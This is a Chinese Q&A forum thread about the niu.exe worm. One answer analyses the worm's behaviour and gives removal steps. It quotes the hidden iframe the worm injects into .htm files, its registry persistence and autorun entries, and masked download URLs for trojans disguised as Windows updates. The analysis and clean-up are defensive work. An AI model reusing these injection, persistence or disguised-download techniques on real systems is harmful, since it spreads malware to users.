不知道为什么逻辑分区双击打不开，而且在任务管理器中会出现一个niu.exe的这么个东西

发布网友发布时间：2022-04-27 07:06

共2个回答

热心网友时间：2023-09-13 04:06

病毒特征：
File: niu.exe
Size: 36141 bytes
MD5: 1E3096FAE27F2E81F0AA73FFFA5171B0
SHA1: BF1639F93B2B6E6E69A32FA6ECEC8ABDB94AC7CF
CRC32: C9ACBC14
病毒运行后：
文件变化:
释放文件C:WINDOWSsystem32crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化
遍历所有分区的htm文件
在其后面插入代码<IfrAmE src=http://www.xxxxxx.cn/htm/htm.htm width=0 height=0></IfrAmE>
遍历所有分区删除*.gho文件
删除C:WINDOWSsystem32verclsid.exe
注册表变化
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
下添加<crsss><C:WINDOWSsystem32crsss.exe> [] 达到开机启动的目的
修改HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue
为0x00000001
达到屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate下面增加
DisableWindowsUpdateAccess键并把其键值设为00000001 关闭windows自动更新功能
如果无连接网络还有如下变化
不断暴力写HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart Page为 www.hao123.com
并且修改HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage 的值为00000001
使得IE主页修改按钮失效
如果连接网络则为如下变化
下载http://www.xxxxxx.cn/htm/IEURL.txt到系统文件夹
该文本内为一网址那么上面的被修改的主页则变为此文本中的网址
下载http://www.xxxxxx.cn/htm/exe.txt到系统文件夹读取里面的内容
下载木马
http://www.xxxxxx.cn/xp/WindowsXP-KB888303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB838201-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB398305-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB983306-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB828301-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB328207-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138308-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB238104-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284302-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB468603-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB878206-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB423807-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138309-x86-CHS.exe
到系统文件夹分别命名为0temp.exe~13temp.exe
木马生成物下面将列出其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙瑞星杀毒软件监控卡卡上网安全助手的ie防漏墙
等而此关闭并非结束进程而是相当于用户的手动按软件上的停止保护（如图）但再次运行该文件后相关保护又会被开启
具体原理不懂希望高手指教
木马植入完毕后生成文件如下
C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
sreng日志如下
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows]
<AppInit_DLLs><dhbpri.dll> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
服务
[Remote Debug Service / RemoteDbg][Stopped/Auto Start]
<C:WINDOWSsystem32rundll32.exe RemoteDbg.dll,input><Microsoft Corporation>
解决方法：
首先把系统时间改回来
并且修改 C:WINDOWSsystem32dhbpri.dll和
C:WINDOWSsystem32ztgpri.dll文件名为其他名称
然后重启计算机进入
安全模式(开机后不断按F8键然后出来一个高级菜单选择第一项安全模式进入系统)
打开sreng
启动项目注册表删除如下项目
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：
Remote Debug Service / RemoteDbg
系统修复－Windows shell/IE 选中
设置主页为"about:blank"和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复

把下面的代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]
"RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
双击1.reg把这个注册表项导入
双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定
点击菜单栏下方的文件夹按钮（搜索右边的按钮）
从左边的资源管理器进入C盘
删除如下文件C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll改完名称的文件
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll改完名称的文件
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
C:WINDOWSsystem32crsss.exe
C:autorun.inf
C:niu.exe
从左边的资源管理器进入其他分区删除autorun.inf和niu.exe。
使用一些工具清理被感染的htm等文件。不过gho文件就没办法恢复了。

热心网友时间：2023-09-13 04:07

我也中了，不过3分钟就解决了。
我是通过删除niu.exe来试探病毒源文件的。试删以后，又出现了!此时发现任务管理器中crsss.exe进程的CPU占用率高了5个百分点。哗！在这里！跟windows的csrss.exe真的很像（竟然之前看半天看不到...我的眼睛呀~~)。OK，关掉它，删除Windows/system32下的crsss.exe，再用右键打开每个硬盘分区，删掉里面的niu.exe和autorun.inf,大功告成，再也没发现出来了！
这方法虽然很没科技含量，但很有效哦。（资源管理器打不开的用IceSword1.20。）
呃，好像lcg.exe也是它的变种衍生版产生的垃圾文件。一样适用啊。